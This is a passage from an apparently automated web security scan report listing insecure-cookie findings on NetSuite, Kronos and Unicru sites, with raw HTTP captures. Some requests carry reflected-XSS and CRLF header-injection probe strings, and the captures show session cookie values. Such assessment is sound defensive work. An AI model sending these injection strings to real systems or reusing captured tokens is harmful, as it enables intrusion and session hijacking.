Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:48 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2000683563:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2RW7N1TCBHr6mQJSv4MJrzV9rnyz359DTygvK7qTzvf13vCc2x2x2JXm5QLhrNbJJQcTCgFLGHhsGp0VQ7FwRJ4b5TpDvcFrLL1Jh18S7vw1h5R7dYbgwShCL6v1QX0C!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.3. https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /Netsparkerd83f087f78ee474db97e8aec33de63c2.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparkerd83f087f78ee474db97e8aec33de63c2.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:10:47 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110553779:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=6gtrN1TV8C9xXWGTLVWNMvDTBLMyV755hCYflZPh1YC9G3WhlHnpqmr03yRfTfPYQpX2lCD12TQ2p4sh2qzn2CRFHBYp2ypxXQ0Ts2HJkxK7TM4GT0WGNXlr2vhsWDqh!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.4. https://checkout.netsuite.com/core/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /core/?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000013)%3C%2Fscript%3E HTTP/1.1
Referer: https://checkout.netsuite.com/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=31PwN1GWQvkMGP2pxGGpgHN2m48g811ybT9HCcv4R2jvLCt8R9y21ywBzs7v4v6KSnRPhyDpZb218XYJ9jkhnLpJpr8m7pxCsyyXnPNz1ChxGGXdMyLzThLVm6jGBpVG!1490567172; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:05 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 333241087:616363742D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=hWd4N1GZGdsflwhjP8VdVGSnB6r2GzJ3SBh92hgS8gqlwWGNvByZJhtmP17wL8Hj9JwLc1dn5gjrrtXLMVZXhDnw7vvQwTP4mMBtPt3ds55G4vp4gF1Zr97r3DHpyLCR!-1220802186; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:27:05 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2650


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...

11.5. https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:08:12 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368749109:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=9pncN1TcCnWLkfJJbLpSq1RR7PL6tyTTw0hR5QMhqLwnSDCyGTFJxJhYwyJYDpG2wJdSpSJy1FLV6lXT1thXwK1jrhJvlSP8KCMDHGZd8DVZ2nQZC2pLR3HTpPgQDCQp!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.6. https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:31 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -812652053:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=JwDGN1TRX3qFJhPv0tBSnhLkTmpW34vhDRvgTkwqLXK4SnvMG3VM1xdGYpsFmKLXPJGL5yG5Lk8PK7KS4HKnfNNzcdJH2J9GRhFDsWdQlvhZyXNFZGnBbnGLKb2GLgXj!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.7. https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:09:35 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110558500:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=C9RcN1TT8snZLj3J8hCcFmJpQ654HjYQZ4F5LCvBvTZ29f1ZnThL0wQpBFWf522QQvf7TN89dBTvLfjsSzfJD1yGKG3D0xhy3Ryv7M0c6rzkzZB1SlWMFLwchzvhwnV2!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.8. https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AYQCDmZk; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:04:40 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110576631:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=MKB8N1NDfnQgHZLLbYDLh4z8yFybC5QDpN14nhTHyDDLBGWlh1d9yCB5hmlfvFCpH1Y1YByvTLKmHv2s5tFSs0FxbnfmZJM1Zpdqds57MzgTGCMyNN5C3zzpW0WtRYhQ!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.9. https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:08:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1112884952:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=kpy0N1TTsKDkPgBGQZchFwhNP2xxQDtJvfwQVvtynWwgQLL0vwPLg1KTvflJQHp8yCnphBG9nfKqGrnvy0Cy2pxD6Br4LW1B7KYyndJyk1mBF7whWgydLzFw85SwJwvl!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.10. https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:38 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2144353504:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=pmQ9N1TXzfvBjH2mhF3Q1jKgWhcfCCjndsRvYYL3lv5kb0VQfGTyhhQQQbjmYcLvyCNhp8Kf20GD1QlTR1F2jfcsTn5Lr1hW0SLCmSrGVSrcZnXL5rhglQsqv9ZFVhG2!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.11. https://checkout.netsuite.com/core/styles/pagestyles.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/pagestyles.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/pagestyles.nl?ct=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3=3 HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:02 GMT
Last-Modified: Mon, 25 Apr 2011 14:27:02 GMT
NS_RTIMER_COMPOSITE: -1134201633:616363742D6A6176613036312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=tXQJN1GWSQGJhxgnQLglP9K2nC3JgRj49hbDh6pTpzfsTnRKQQ1Dk0D1X5PfwJGyCLhxyJQfpJxpGHzCJV4sK1VsMCzpln6GNyht1gnPJpDGpHp3rdQFqyYz8rzCzbJN!-1435542349; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css; charset=UTF-8
Content-Length: 67958

.iArrowLeft, .iArrowRight { display:inline-block; height:15px; width:16px; margin: 0 2px; background: url(/images/chiles/dashboard_icons.png) no-repeat; text-decoration: none; zoom:1}
.iArrowLeft { ma
...[SNIP]...

11.12. https://checkout.netsuite.com/pages/portal/css/main.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /pages/portal/css/main.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/portal/css/main.css?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00007E)%3C/script%3E HTTP/1.1
Referer: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=fspzN1GhTphyBQvLpyGdlJdh6BL8whyTwq2X78f8hxRthNWT2Z3jy4GGPSzLlnVZdyGJQxSTzT2hfvnn6y9XwhnznRTRZbMw6QGzXJcyQ2jBFp97np87tTDKTCTHXpxD!-1598522165; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:12:54 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Sat, 23 Apr 2011 00:28:30 GMT
NS_RTIMER_COMPOSITE: 225122148:616363742D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2ln9N1PQC1pBlnRWMG11FTSzZ6Q7LFs2lFNbJYnZ9dvJs5NzSj9RQKLJB0jQbCcLrsWnHTJhh0vdnB0mgnkmGyrxYmLv5WCDzrjppnpZy6JLTGMDpZ7c9R9LvKTjTMqt!-1598522165; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css
Content-Length: 2044

td, p        {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #333333;
   font-size: 11px;
}

.blueSubhead        {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #004584;
   font-weight:
...[SNIP]...

11.13. https://checkout.netsuite.com/pages/portal/page_not_found.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /pages/portal/page_not_found.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/portal/page_not_found.jsp?internal=F HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:59 GMT
Server: Apache
NS_RTIMER_COMPOSITE: -690374290:616363742D6A6176613038362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=0K8PN1GJqgGn0JkkHrzfLxHcVjNhkHczxJ5J34JfcXdnJGwzK09nybznnTnCvp8D498vLcRWvvh2CF7BJVDVQrVtHmgnlt8tVTVJzTsP1cDqMsf7gd27xTwt1BJB9BL4!-1927254259; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11320


<html><head><title>NetSuite | Page Not Found</title>
<meta name="robots" content="noindex,nofollow">
<link rel="STYLESHEET" type="text/css" href="/pages/portal/css/main.css">
</head>
<body bgcolor
...[SNIP]...

11.14. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s.nl?c=438708&sc=4&whence=&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1700514546:616363742D6A6176613031382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; path=/
Set-Cookie: NLVisitorId=rcHW8495AWICDiX0; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=869
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2244


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...

11.15. https://customer.kronos.com/Default.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://customer.kronos.com
Path:   /Default.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

HEAD /Default.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: customer.kronos.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Set-Cookie: KronosCust=LogIn=false; path=/
Set-Cookie: ASPSESSIONIDQASQRRDR=GKMMPBCAFDPKJBLLDIIBOHPD; path=/
Cache-control: private


11.16. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /asp/home/login.asp HTTP/1.1
Host: employer.unicru.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
